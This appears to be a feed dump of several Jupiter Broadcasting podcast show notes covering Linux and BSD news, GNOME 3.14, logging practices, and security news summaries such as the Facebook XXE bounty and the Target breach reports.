• How to Protect your Server Against the Shellshock Bash Vulnerability | DigitalOcean

Shellshock BASH Vulnerability Tester

You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.

• shellshocker · GitHub

Weekly Spotlight

RockStor: Store Smartly: Free Advanced File Storage

Installs on 64-bit commodity hardware or virtual machine
Built on top of Enterprise Linux operating system
Supports NA sharing protocols including Samba/CIFS, NFS and SFTP
Efficient storage management functionility with web-ui or CLI
Extend functionality with plugins

— NEWS —

GNOME 3.14 Released, See What`s New

After six months of development, GNOME 3.14 was released today and it includes quite a few interesting changes such as multi-touch gestures for both the system and applications, re-worked default theme, new animations as well as various enhancements for the code GNOME applications.

• Gnome 3.14 reviewed on Arch Linux

In a nutshell I like Gnome 3.14 a lot. It’s a really nice release. Though I am a hard core Plasma user, I see myself spending some time with Gnome, enjoying things like online integration, easy-to-set-up Evolution and many more features which I can’t find in KDE’s Plasma. That said, both are my favorite. They both excel in their focus areas. If you have not tried Gnome yet, do give it a try.

• Gesture support in Shell Apart from Touch support in Shell there is also…

Apart from Touch support in Shell there is also support for GNOME apps and in fact some GNOME apps they do use gestures!

• GTK+ 3.14 Brings Much Better Wayland Support, Multi-Touch, New Theme

The Wayland changes for GTK+ 3.14 include support for the recently released Wayland 1.6, touch input is now supported, working drag-and-drop support, and support for the GNOME classic mode.

• Download GNOME 3.14 ISO (based on Fedora 21)

• Touching on Touchscreen Support | Erich Eickmeyer

Touchscreens are no longer just for tablets and phones. Touchscreen laptop computers and desktops are becoming the norm, if not more common, in the computer market. Much of this has been spurred-on by Microsoft and Windows 8, whose “Modern” interface is about as touchscreen-friendly as you can get. In fact, it is what is driving the laptop market to include capacitive touchscreens.

The nosh package

It should also be suitable for filling the gap caused by the
systemd tool not being portable outwith the Linux kernel since it
is known to work on proper BSD and on Debian Linux, and therefore
should work on Debian kFreeBSD.

Ubuntu 14.10 Beta Downloads Now Available

There’s not even a new default desktop wallpaper.

• Why GNOME 3.14 Won’t Be Included in Ubuntu 14.10 – OMG! Ubuntu!

Feature Freeze is the point past which no new features, packages or APIs are introduced, with emphasis placed on polish and bug fixing to ensure as stable an experience as possible. Feature Freeze for Ubuntu 14.10 and its flavors came into effect on August 21 — a month prior to the release of GNOME 3.14 Stable.

It’s this tight timeframe that conspires against the Ubuntu GNOME team, making it impossible for them to include latest GNOME stack. If you were one of those who hoped to find GNOME 3.12 in Ubuntu 14.04 LTS, you’ll be familiar with the impact this has.

A series of maintained PPAs — Stable, Staging, and Next — provide backports of newer GNOME releases to Ubuntu, allowing you to optionally roll with (potentially untested) newer software should you want to.

Tech Talk Today | A Daily Tech News Show with a Linux Perspective

• Tech Talk Today Subreddit

— FEEDBACK —

• Jupiter Broadcasting Fall/Spring Jacket | Teespring

• Jupiter Broadcasting at Ohio LinuxFest – Google+

— CHRIS’ STASH —

• jupiterbroadcasting on Instagram

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— MATT’S STASH —

• Check out LINUX Unplugged
• Articles by Matt Hartley

Find us on Google+

• Chris
• Matt Hartley
• Jupiter Broadcasting’s Page

Find us on Twitter

• Chris – ChrisLAS
• Matt – matthartley

Follow the network on Facebook

• Jupiter Broadcasting on Facebook

Catch the show LIVE Sunday 10am Pacific / 1pm Eastern / 6pm UTC:

• https://jblive.tv
• Network Calendar

The post Weaponized Bash | Linux Action Show 332 first appeared on Jupiter Broadcasting.

We\’re back from BSDCan! This week on the show we\’ll be chatting with Brian Callahan and Aaron Bieber about forming a local BSD users group. We\’ll get to hear their experiences of running one and maybe encourage some of you to start your own!

After that, we\’ve got a tutorial on the basics of NetBSD\’s package manager, pkgsrc. Answers to your emails and the latest headlines, on BSD Now – the place to B.. SD.

Thanks to:

Direct Download:

Video | HD Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | HD Vid Feed | HD Torrent Feed

– Show Notes: –

Headlines

FreeBSD 11 goals and discussion

• Something that actually happened at BSDCan this year…
• During the FreeBSD devsummit, there was some discussion about what changes will be made in 11.0-RELEASE
• Slides from Dev Summit
• Some of MWL\’s notes include: the test suite will be merged to 10-STABLE, more work on the MIPS platforms, LLDB getting more attention, UEFI boot and install support
• A large list of possibilities was also included and open for discussion, including AES-GCM in IPSEC, ASLR, OpenMP, ICC, in-place kernel upgrades, Capsicum improvements, TCP performance improvements and A LOT more
• There\’s also some notes from the devsummit virtualization session, mostly talking about bhyve
• Lastly, he also provides some notes about ports and packages and where they\’re going

An SSH honeypot with OpenBSD and Kippo

• Everyone loves messing with script kiddies, right?
• This blog post introduces Kippo, an SSH honeypot tool, and how to use it in combination with OpenBSD
• It includes a step by step (or rather, command by command) guide and some tips for running a honeypot securely
• You can use this to get new 0day exploits or find weaknesses in your systems
• OpenBSD makes a great companion for security testing tools like this with all its exploit mitigation techniques that protect all running applications

NetBSD foundation financial report

• The NetBSD foundation has posted their 2013 financial report
• It\’s a very \”no nonsense\” page, pretty much only the hard numbers
• In 2013, they got $26,000 of income in donations
• The rest of the page shows all the details, how they spent it on hardware, consulting, conference fees, legal costs and everything else
• Be sure to donate to whichever BSDs you like and use!

Building a fully-encrypted NAS with OpenBSD

• Usually the popular choice for a NAS system is FreeNAS, or plain FreeBSD if you know what you\’re doing
• This article takes a look at the OpenBSD side and explains how to build a NAS with security in mind
• The NAS will be fully encrypted, no separate /boot partition like FreeBSD and FreeNAS require – this means the kernel itself is even protected
• The obvious trade-off is the lack of ZFS support for storage, but this is an interesting idea that would fit most people\’s needs too
• There\’s also a bit of background information on NAS systems in general, some NAS-specific security tips and even some nice graphs and pictures of the hardware – fantastic write up!

Interview – Brian Callahan & Aaron Bieber – admin@lists.nycbug.org & admin@cobug.org

Forming a local BSD Users Group

Tutorial

The basics of pkgsrc

News Roundup

FreeBSD periodic mails vs. monitoring

• If you\’ve ever been an admin for a lot of FreeBSD boxes, you\’ve probably noticed that you get a lot of email
• This page tells about all the different alert emails, cron emails and other reports you might end up getting, as well as how to manage them
• From bad SSH logins to Zabbix alerts, it all adds up quickly
• It highlights the periodic.conf file and FreeBSD\’s periodic daemon, as well as some third party monitoring tools you can use to keep track of your servers

Doing cool stuff with OpenBSD routing domains

• A blog post from our viewer and regular emailer, Kjell-Aleksander!
• He manages some internally-routed IP ranges at his work, but didn\’t want to have equipment for each separate project
• This is where OpenBSD routing domains and pf come in to save the day
• The blog post goes through the process with all the network details you could ever dream of
• He even named his networking equipment… after us

LibreSSL, the good and the bad

• We\’re all probably familiar with OpenBSD\’s fork of OpenSSL at this point
• However, \”for those of you that don\’t know it, OpenSSL is at the same time the best and most popular SSL/TLS library available, and utter junk\”
• This article talks about some of the cryptographic development challenges involved with maintaining such a massive project
• You need cryptographers, software engineers, software optimization specialists – there are a lot of roles that need to be filled
• It also mentions some OpenSSL alternatives and recent LibreSSL progress, as well as some downsides to the fork – the main one being their aim for backwards compatibility

PCBSD weekly digest

• Lots going on in PCBSD land this week, AppCafe has been redesigned
• The PBI system is being replaced with pkgng, PBIs will be automatically converted once you update
• In the more recent post, there\’s some further explanation of the PBI system and the reason for the transition
• It\’s got lots of details on the different ways to install software, so hopefully it will clear up any possible confusion
• Working on adding support for FDE with GELI using GRUB for 10.0.2
• Any devs who can grock the GRUB geli code are welcome to contact Kris

Feedback/Questions

• Antonio writes in
• Daniel writes in
• Sean writes in
• tsyn writes in
• Chris writes in

• All the tutorials are posted in their entirety at bsdnow.tv
• Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
• If you\’ve got something cool to talk about and want to come on for an interview, shoot us an email
• Michael Lucas will be giving a live presentation next Tuesday, \”Beyond Security: Getting to Know OpenBSD’s Real Purpose\” so be sure to catch that
• Preorders for the book of PF\’s third edition are up
• We got a picture of a bunch of old FreeBSD CDs
• Watch live Wednesdays at 2:00PM Eastern (18:00 UTC)

The post A BUG's Life | BSD Now 38 first appeared on Jupiter Broadcasting.

On today\’s show we have an interview with Joe Marcus Clark, one of the original portmgr members in FreeBSD, and one of the key GNOME porters. Keeping along with that topic, we have a FreeBSD ports tutorial for you as well. The latest news and answers to your BSD questions, right here on BSD Now – the place to B.. SD.

Thanks to:

Direct Download:

Video | HD Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | HD Vid Feed | HD Torrent Feed

– Show Notes: –

Headlines

Tailoring OpenBSD for an old, strange computer

• The author of this article had an OmniBook 800CT, which comes with a pop-out mouse, black and white display, 32MB of RAM and a 133MHz CPU
• Obviously he had to install some kind of BSD on it!
• This post goes through all his efforts of trimming down OpenBSD to work on such a limited device
• He goes through the trial and error of \”compile, break it, rebuild, try again\”
• After cutting a lot out from the kernel, saving a precious megabyte here and there, he eventually gets it working

pkgsrcCon and BSDCan

• pkgsrccon is \”a technical conference for people working on the NetBSD Packages Collection, focusing on existing technologies, research projects, and works-in-progress in pkgsrc infrastructure\”
• This year it will be on June 21st and 22nd
• The schedule is still being worked out, so if you want to give a talk, submit it
• BSDCan\’s schedule was also announced
• We\’ll be having presentations about ARM on NetBSD and FreeBSD, PF on OpenBSD, Capsicum and casperd, ASLR in FreeBSD, more about migrating from Linux to BSD, FreeNAS stuff and much more
• Kris\’ presentation was accepted!
• Tons of topics, look forward to the recorded versions of all of them hopefully!

Two factor auth with pushover

• A new write-up from our friend Ted Unangst
• Pushover is \”a web hook to smartphone push notification gateway\” – you sent a POST to a web server and it sends a code to your phone
• His post goes through the steps of editing your login.conf and setting it all up to work
• Now you can get a two factor authenticated login for ssh!

The status of GNOME 3 on BSD

• It\’s no secret that the GNOME team is a Linux-obsessed bunch, almost to the point of being hostile towards other operating systems
• OpenBSD keeps their GNOME 3 ports up to date very well, and Antoine Jacoutot writes about his work on that and how easy it is to use
• This post goes through the process of how simple it is to get GNOME 3 set up on OpenBSD and even includes a screencast
• A few recent posts from some GNOME developers show that they\’re finally working with the BSD guys to improve portability
• The FreeBSD and OpenBSD teams are working together to bring the latest GNOME to all of us – it\’s a beautiful thing
• This goes right along with our interview today!

This episode was brought to you by

Interview – Joe Marcus Clark – marcus@freebsd.org

The life and daily activities of portmgr, GNOME 3, Tinderbox, portlint, various topics

Tutorial

The FreeBSD Ports Collection

News Roundup

DragonflyBSD 3.8 goals and 3.6.1 release

• The Dragonfly team is thinking about what should be in version 3.8
• On their bug tracker, it lists some of the things they\’d like to get done before then
• In the meantime, 3.6.1 was released with lots of bugfixes

NYCBSDCon 2014 wrap-up piece

• We\’ve got a nice wrap-up titled \”NYCBSDCon 2014 Heats Up a Cold Winter Weekend\”
• The author also interviews GNN about the conference
• There\’s even a little \”beginner introduction\” to BSD segment
• Includes a mention of the recently-launched journal and lots of pictures from the event

FreeBSD and Linux, a comparative analysis

• GNN in yet another story – he gave a presentation at the NYLUG about the differences between FreeBSD and Linux
• He mentions the history of BSD, the patch set and 386BSD, the lawsuit, philosophy and license differences, a complete system vs \”distros,\” development models, BSD-only features and technologies, how to become a committer, overall comparisons, different hats and roles, the different bsds and their goals and actual code differences
• Serves as a good introduction you can show your Linux friends

PCBSD CFT and weekly digest

• Upgrade tools have gotten a major rewrite
• You have to help test it, there is no choice! Read more here
• How dare Kris be \”unimpressed with\” freebsd-update and pkgng!?
• Various updates and fixes

Feedback/Questions

• Jeffrey writes in: https://slexy.org/view/s213KxUdVj
• Shane writes in: https://slexy.org/view/s20lwkjLVK
• Ferdinand writes in: https://slexy.org/view/s21DqJs77g
• Curtis writes in: https://slexy.org/view/s20eXKEqJc
• Clint writes in: https://slexy.org/view/s21XMVFuVu
• Peter writes in: https://slexy.org/view/s20Xk05MHe

• All the tutorials are posted in their entirety at bsdnow.tv
• Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
• Our email backlog is totally caught up now, so email us all your questions!
• Watch live Wednesdays at 2:00PM Eastern (19:00 UTC)

The post Port Authority | BSD Now 26 first appeared on Jupiter Broadcasting.

Facebook just paid out their biggest bug bounty yet, we’ll tell you about the flaw was so major it warranted a $33k bounty. Plus it’s been a bad week for Chrome security…

Then it’s a big batch of your questions, our answers, and much much more!

Thanks to:

— Show Notes: —

Facebook pays out biggest bug bounty ever, $33,500 after researcher gets ‘keys to the kingdom’

• Reginaldo Silva, a Brazilian security researcher, found a remote execution flaw in Facebook and was able to perform various functions including coping the /etc/passwd file, getting him a list of the users that exist on the system, and could have changed the URL for the Google OpenID provider, in order to execute MitM attacks on users logging in to Facebook using their Gmail accounts
• The original flaw was found in September 2012, when the researcher discovered an XXE (XML External Entity) bug in a Drupal blogs OpenID provider
• After finding the flaw in OpenID, he tried the attack successfully against StackExchange
• Later he also tried it against Google, while it worked, he was not able to read any files or make any network connections. For this he received his first bug bounty, $500 from Google
• During the original investigation, he could not find a valid Facebook OpenID endpoint
• Some time later, while investigating the Facebook password reset system, he discovered they still used OpenID for Gmail users to reset their passwords
• Using the newly discovered endpoint, he still was not able to launch his attack, because Facebook only communicated with Google, and for the attack to work he needed to communicate with his malicious OpenID provider
• After more reading of the OpenID spec, he found what he was looking for and was able to cause Facebook to contact his server, parse his malicious XML and cause Facebook’s servers to run code of his choosing
• From this he was able to get a copy of the /etc/passwd from the server
• Researcher’s Blog Post
• Facebook Security Team Blog Post
• Facebook Extends Bug Bounty Program

Security companies remove information about target breach from the Internet

• One we had previously covered:
• “On Dec. 18, a malicious software sample was submitted to ThreatExpert.com, a Symantec-owned service. But the public report the service generated vanished. “
• However, as is often the case with the internet, someone (Krebs ftw) had a copy of the report and posted it
• “iSight Partners, a Dallas-based cybersecurity company that is working with the U.S. Secret Service, published a series of questions and answers on its website related to the attacks on point-of-sale devices at U.S retailers. That too vanished on Thursday.”
• “Intel-owned McAfee redacted on Tuesday a blog post from last week that contained technical detail similar to the ThreatExpert.com report”
• When queried, a Symantec spokeswoman said “we took the initiative to remove it because we didn’t want the information to compromise the ongoing investigation.”
• Alex Holden, founder of Hold Security, who worked with Brian Krebs on the Adobe breach, said it was the right move for Symantec to pull the report, as attackers might have been able to use the information to compromise other point-of-sale devices at other retailers
• “I was surprised that this information was posted on the Internet in the first place,” Holden said. “Besides having a Target machine’s name and its IP address, system structure and drive mapping, it discloses a very vital set of credentials setup specifically for exploitation of the device.”
• As many as six other U.S. companies are believed to be victims of point-of-sale related attacks, where malware intercepts unencrypted card details. So far, only Target and high-end retailer Neiman Marcus have acknowledged the attacks.

Adware vendors buy Chrome Extensions to send ad- and malware-filled updates

• While Chrome itself is updated automatically by Google, that update process also includes Chrome’s extensions, which are updated by the extension owners.
• This means that it’s up to the user to decide if the owner of an extension is trustworthy or not, since you are basically giving them permission to push new code out to your browser whenever they feel like it.
• Ownership of a Chrome extension can be transferred to another party, and users are never informed when an ownership change happens.
• Malware and adware vendors have caught wind of this and have started showing up at the doors of extension authors, looking to buy their extensions.
• Once the deal is done and the ownership of the extension is transferred, the new owners can issue an ad-filled update over Chrome’s update service, which sends the adware out to every user of that extension.
• A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the “Add to Feedly” extension.
• One morning, the extension author got an e-mail offering “4 figures” for the sale of his Chrome extension. The extension was only about an hour’s worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.
• A month later, the new extension owners released their first (and so far only) update, which injected adware on all webpages and started redirecting links.
• This isn’t a one-time event, either. About a month ago, I had a very simple Chrome extension called “Tweet This Page” suddenly transform into an ad-injecting machine and start hijacking Google searches.
• Google has stated that Chrome’s extension policy is due to change in June 2014. The new policy will require extensions to serve a single purpose.
• Chromium Blog: Keeping Chrome Extensions Simple

• FauxShow Sticker Awards

Feedback:

• Allan’s home network setup
  • VLAN A – Home network (upstairs), plus hidden WiFi SSID, only has access to personal ZFS server
  • VLAN B – Office network, WiFi, connections machines work
  • VLAN C – Management network, switches, IPMI, PDUs etc
  • VLAN D – Guest Wireless
  • VLAN E – DMZ for servers
  • Personal ZFS server has separate interfaces on VLAN A and B
  • FreeBSD PF Firewall is only machine that can route between the VLANs
  • DMZ is not used yet, will be once 1000mbps unmetered Fibre connection arrives
  • Gear Used: Netgear GS724T 24port gig-e switch.
• Dropbox De-dupe BS
  • How Tarsnap Works
• Authentication for Linux
• IBM SMartCloud Mini War Story
• jupiterbroadcasting on Instagram
• BSD Now tutorial contest, win a hand-made FreeBSD Pillow

Round Up:

• Network Solutions, the original domain name registrar, appears to be automatically enrolling customers in a $1850/year “WebLock Security Service”, you must call to opt-out
• FreeBSD 10.0-RELEASE Announcement
• Developer finds Chrome eavesdropping bug
• Target restarts push for Chip&Pin protected cards (Common in Europe and Canada) after failed adoption 10 years ago
• IBM says goodbye to x86 forever, sells server lines to Lenovo
• Backblaze publishes reliability numbers of different models of hard drive
• The Most (and Least) Reliable Hard Drive Brands
• Researchers tell Congess Healthcare.gov is insecure, researchers able to get 70,000 records in only 4 minutes
• Kids, this is story of How I Met… my VPS hacked.
• 16 Million German users infected with malware that steals passwords, email addresses and other sensitive data
• More from last week, a Documentary on the first trans-atlantic telephone cable
• How a DNS query works Get DNSMadeEasy Hosting
• EasyDNS wins case and blocks London Police takedown order, domain transered

The post Tarnished Chrome | TechSNAP 146 first appeared on Jupiter Broadcasting.

Mike and Chris chat about Firefox OS’s big boost, and how things could be starting to get very interesting for mobile and HTML5 developers. Then debate if Canonical is surrendering the desktop war.

Plus Mike reviews his new HTC One, your emails, and more!

Thanks to:

GoDaddy.com Use our code coder249 to get a .COM for $2.49.

Direct Download:

MP3 Audio | OGG Audio | Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed | iTunes Audio | iTunes Video

Feedback:

• Dev Horror story Android not updated by the manufacturer can be a big deal

• Mid-level development

HTC ONE: The Mike Review

• HTC One review | BGR

The HTC One is the best Android smartphone in the world — period. It combines some of the best materials with the most incredible screen I\’ve seen, and is the fastest and most responsive Android phone I have used.

• HTC One Review: The Competition Is Fierce, But HTC’s New Flagship Rises To The Challenge | TechCrunch

I can boil the preceding 3,000 or so words into a few brief sentiments for you to chew on: the HTC One is easily the best device that the company has ever crafted, and it\’s perhaps the single nicest Android phone I\’ve ever used. Despite some minor faults, I haven\’t so much as picked up any of the other Android smartphones scattered around my office during my time with the One unless I absolutely had to. It\’s really that good.

• Review: HTC One Is the Current King of the Android Hill

The phone — like all phones — does have its shortcomings. There\’s no way to expand the storage, which HTC attempts to address by shipping the base model with 32 gigabytes of memory instead of the more standard 16 gigabytes. There\’s also no way to replace the battery. The power button on the top left of the phone is set at a bit of a downward angle that forces your finger to curl up and over the top edge of the phone in order to access it, which makes waking the phone up a tad cumbersome at times. And people with small hands may still find the 4.7-in.-screened handset too large to use comfortably.

Hoopla:

• Mozilla and China » Foxconn Joins the Firefox OS Eco-System

At a press conference earlier today in Taipei (2pm local time on 6/3/2013),****the Foxconn Technology Group announced their support for Firefox OS, Mozilla\’s open Web mobile operating system. The partnership includes collaboration on the use of the Firefox OS on Foxconn devices to create new, integrated offerings. For complete press release, see Mozilla\’s press center for more details.

• Mozilla inks deal with Foxconn to co-develop Firefox OS devices, shows off its first-ever tablet

• Mozilla inks deal with Foxconn to co-develop Firefox OS devices, shows off its first-ever tablet

As you may have already heard, the former company has signed on to become the 19th member of the latter\’s Firefox OS alliance, and it\’s already working on at least five devices.

• Mark Shuttleworth gives up dream of Ubuntu toppling Windows | Ars Technica

Today, Shuttleworth has declared the bug \”closed,\” but the bug wasn\’t fixed as a result of Ubuntu\’s popularity. It was fixed by the rise of iOS and Android. As for Ubuntu, Shuttleworth now says, \”it\’s better for us to focus our intent on excellence in our own right rather than our impact on someone else\’s product.\”

Tool of the Week

• Airmail

Book of the Week

• Amazon.com: Gates: How Microsoft\’s Mogul Reinvented an Industry–and Made Himself the Richest Man in America

The post 52 Commits | CR 52 first appeared on Jupiter Broadcasting.

We wrap up our week with the Arch challenge! We report our successes, our failures, and how the dynamics of the Arch community can be a bit of a challenge for new users.

Plus getting the assistance you need when tackling a challenge in Arch, the upcoming features in Gnome 3.10, Mark Shuttleworth closing Ubuntu’s #1 bug, and we give away some Steam games!

All this week on, The Linux Action Show!

Thanks to:

GoDaddy.com Use our code linux249 to score .COM for just $2.49! 35% off your ENTIRE first order just use our code 35off2 until the end of the month!
Ting.com Visit las.ting.com to save $25 off your device or service credits.

Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | Ogg Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds | Torrent Feed

Support the Show:

— Show Notes: —

Arch Challenge Results:

Brought to you by: System76

• Arch Challange Daily Videos

• One Week Arch Linux Challenge : Super Nathan’s Blog

• They say arch is unstable? How long as your arch setup lasted.

• Arch Linux Survival Guide

• Setup, how challenging it is vs using a Distro re-spin of Arch

• Post Install Configuration

• Community, the good, the bad, and the elite.

• Long term concerns and plans

---

– Picks –

Runs Linux:

• This prosthetic knee, Runs Linux!

• Thanks to CptFlashdrive in the Linux Action Show SubReddit

Android Pick:

• ArchWiki Viewer

• Android Picks so far thanks to Madjo in the IRC Chat room!

Desktop App Pick:

• SimpleScreenRecorder

• simplescreenrecorder in AUR

• An Nvidia Glitch with SimpleScreenRecoder

• Picks so far

• Madjo

Search our past picks:

• LASAppPicks

This tumblr contains the Linux app picks from the Linux Action Show. Both the Linux apps and the Android apps

Git yours hands all over our STUFF:

• Jupiter Broadcasting Affiliate Extensions
• Callisto-app – Google Project Hosting
• Quick Update to the Jupiter Broadcasting Android App

---

— NEWS —

• City of Munich: “Migration to sustainable desktop completed successfully”

• GNOME 3.10 to Bring New Features

• Mark Shuttleworth Marks Bug 1 – ’Microsoft Has Majority Marketshare – As Fixed | OMG! Ubuntu!

• Woe is Linux. Woe is Me. | John C. Dvorak

• Reversal: Australian Govt picks ODF doc standard

— /etc: Let’s Play —

Brought to you by: Untangle

• Let’s play Psychonauts

• Lets Play Jedi Academy on Linux

• LASt minute “lets play” submission. A few games you’ve never seen.

– Feedback: –

• Can’t quite make the switch!

• Motion or AE like Software for Linux?

• A review of Manjaro Linux?

• EFF to Fight Podcast Patent Troll

— Chris’ Stash —

• Amir Taaki Interview and #Bitcoin 2013 Wrap Up

• Tap That Journalist | Unfilter 51

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— What’s Matt Doin? —

• Ubuntu vs. Windows 8: Which Is Better Overall?
• Writing about Linux, sometimes, even asking tough questions
• Hell froze over, Matt’s on Facebook

— Find us on Google+ —

• Chris
• Matt Hartley
• Jupiter Broadcasting’s Page

— Find us on Twitter —

• Chris – ChrisLAS
• Matt – matthartley

— Follow the network on Facebook: —

• Jupiter Broadcasting on Facebook

— Catch the show LIVE Sunday 10am Pacific / 1pm Eastern / 6pm UTC: —

• https://jblive.tv
• Network Calendar

The post The Arch Way | AAS s27e03 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/37661/bsdcan-2013-recap-techsnap-111/ Thu, 23 May 2013 16:42:54 +0000 https://original.jupiterbroadcasting.net/?p=37661 Researchers find exploits for popular game engines, plus TerraCom epic privacy breach, a recap from BSDcan 2013

The post BSDCan 2013 Recap | TechSNAP 111 first appeared on Jupiter Broadcasting.

]]>

Researchers find exploits for popular game engines, putting both clients and servers at risk, we’ll share the details.

Plus TerraCom epic privacy breach, a recap from BSDcan 2013, your questions our answers, and much much more!

On this week’s TechSNAP!

Thanks to:

GoDaddy.com Use our code tech249 to score .COM for $2.49! 32% off your ENTIRE first order just use our code go32off3 until the end of the month!

Direct Download: HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent | Mobile Torrent RSS Feeds: HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feeds | Torrent Feed

 

Support the Show:

Purchase anything at Amazon.com Purchase anything at Think Geek using this link Purchase anything at Newegg using this link Contribute directly on our donation page or check out our advertising options and reach millions of amazing people! Grab our Chrome Extension and auto-tag your shopping session for us!

   

Show Notes:

Get TechSNAP on your Android:

• Callisto – Android App
• Jupiter Broadcasting – Android App by ShaneQful

Browser Affiliate Extension:

• Jupiter Broadcasting Affiliate Extensions for Chrome and Firefox

Researchers find exploits for popular game engines, putting both clients and servers at risk

• Researchers from ReVuln have found various flaws in a number of different video game engines including the Unreal3 Engine, the Quake4 (IDTech4) Engine and CryEngine3
• These vulnerabilities work against a large array of games because the same or slightly modified engines are used in many different titles
• The exploits vary, some allow the attacker to compromise the game server with remote code execution (see video, latter portion shows the attacker remotely starting windows calc.exe on the game server)
• The exploits also allow the servers to be used in denial of service attacks, or to make the servers attack each other, or the master server (from which clients get a list of game servers to connect to)
• Some exploits also attack the client
• Research PDF

---

Reporters accused of hacking for using wget to download files found via a google search

• Investigative Journalists from the Scripps Howard News Service were investigate TerraCom and YourTel America, specifically their participation in the US government’s ‘lifeline’ service, which provides telephone service to low-income families
• While doing a google search, the journalists found records stored on a server belonging to Call Centers India Inc., which was working under contract with VCare Inc, which had been hired by TerraCom to verify the eligibility of applicants
• A second google search revealed that more than 44,000 applications had been indexed by google, these applications include sensitive personal information and supporting documentation such as:
  • Social Security numbers
• Birth dates
• Home addresses
• Scanned copies of passports and driver’s license
• Financial accounts
• Tax records
• An identity thief would only dream of finding such a treasure trove
• The information appears to have just been dumped into web-accessible directories on a public facing web server, which google eventually found
• The journalists used wget to bulk-download the data
• The journalists then contacted TerraCom to report the exposed data, and were promptly accused of ‘hacking’, and threatened charges under the ‘Computer Fraud and Abuse Act’
• The data was pulled offline within hours
• In a statement on TerraComs website the company claims to have been the victim of a security breach, even though this seem more like a case of negligence
• In a statement, a legal representative for Scripps said “in the process of gathering newsworthy information, the bureau accessed – via a basic Internet search – personal and confidential information that apparently is available to anyone with a computer, an outlet and access to electricity. The search required no special skill and in no way ‘hacked’ or illegally accessed any server or database operated by TerraCom or any other company”

---

Google plans to replace all of their SSL certificate keys with 2048 bit keys by the end of 2013

• As computers get more powerful, the possibility of someone managing to crack a specific cryptographic key grows and it becomes time to increase the strength of those cryptographic systems by using longer keys
• As such, Google plans to replace all of their 1024 bit SSL keys with stronger 2048 bit keys, starting August 1st and finishing before the end of the year
• Most SSL Certificate Authorities has not issued new certificates with keys less than 2048 bits since the CA/Browser forum published “Baseline Requirements for the Issuance and Management of Publicly-Trusted Certificates v1.0” which requires that any certificate issued after 2013–12–31 use a 2048 bit key
• In addition, The US National Institute of Standards and Technology (NIST) issued “NIST Special Publication 800–57, Recommendation for Key Management”. In which they advise that 1024-bit RSA keys are no longer be viable (after 2010) and advises moving to 2048-bit RSA keys. NIST believes that 2048-bit keys should be viable until 2030.
• Google has a number of recommendations to people who implement SSL, to ensure that these changes do not disrupt services or devices, mostly they recommend against using ugly hacks, or assuming anything about the way Google does SSL

---

Feedback

• OAuth is not “single sign-on”!

• Using all TEH Cores?

• How is Bhyve coming along ?
  • There was a talk at BSDCan 2013 about this, in addition to a session at the DevSummit (I was in a different session though)
  • Slides from BSDCan 2013
  • Semi-Official bhyve website
  • Slides from the FreeBSD Developers Summit @ BSDCan 2013 re: behyve
  • Dev Summit Slides re: virtualization in general

• Have you guys hear of this port knocker software?

• Improve Security with an OSS Server but Closed Client?

• pfSense File Server?

Round Up

• Netflix @ BSDCan 2013 – slides
• Google engineer publicizes Windows zero-day bug, claims Microsoft is ‘difficult to work with’
• Charges filed in cyber bank heist, attackers compromised bank computers and increased account balances on prepaid cards, then cashed out $45 million from ATMs in 24 countries
• Hackers Who Breached Google in 2010 Accessed Company’s Surveillance Database
• Exploit for local Linux kernel bug in circulation, introduced in a patch in 2010, backported to older Linux kernels by Redhat. Exploit seems to have existed since 2010
• IE8 bug used in targetted attack against Korean military sites
• Investigating a DDoS for hire service
• Hire DDoS attack service ‘legal’ and connected to FBI
• Order your Internet Password Minder Protector Minder today

The post BSDCan 2013 Recap | TechSNAP 111 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/32961/captains-log-cr-39/ Mon, 04 Mar 2013 13:35:46 +0000 https://original.jupiterbroadcasting.net/?p=32961 At a minimum errors need to be logged with enough information to point to the line of code, but where do you go from there?

The post Captain’s Log | CR 39 first appeared on Jupiter Broadcasting.

]]>



You know you need to do it, and today Mike tries to convince you. At a minimum errors need to be logged with enough information to point to the line of code, but where do you go from there? Slogging through bug reports, pulling important metrics, and a few bumps and bruises.

Plus: The inventory problem developers face, some forgotten glory, defending Yahoo, a batch of your feedback and more!

Thanks to:

GoDaddy.com Use our code coder295 to get a .COM for $2.95.
Ting.com Visit coderradio.ting.com to save $25 off your device or service credits.

Direct Download:

MP3 Audio | OGG Audio | Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed | iTunes Audio | iTunes Video

— Show Notes —

Feedback

• Louie points out my super high pitched voice on the word “business” in the last show

• Mike asks:

  “With every platform having its own app store you would think that it would be a boom for Indy Devs. But I don\’t believe that is the case because app discovery seems to suck on all platform. Am I crazy or correct? Is there anyone trying to fix this? Like a place that promotes Indy apps?”

• Dominic’s Question: The Stupid Client Problem

• Mike share’s the forgotten glory of Balmer doing TV ads in the 80’s
• A lot of divided opinion re Yahoo’s ban on working from home

Logging

• The essence of ¿Que?
• The feel of ¿Por Que?

Two key types of logging

• Diagnostic logging

Do you care enough to throw an exception up through the app or manage it another way? This is an \”it depends\” but logging info level messages probably should be skipped.

• Audit logging

Audit logging captures significant events in the system and are what management and the legal eagles are interested in. This is things like who signed off on something, who did what edits, etc. As a sysadmin or developer troubleshooting the system, you\’re probably only mildly interested in these. However, in many cases this kind of logging is absolutely part of the transaction and should fail the whole transaction if it can\’t be completed.

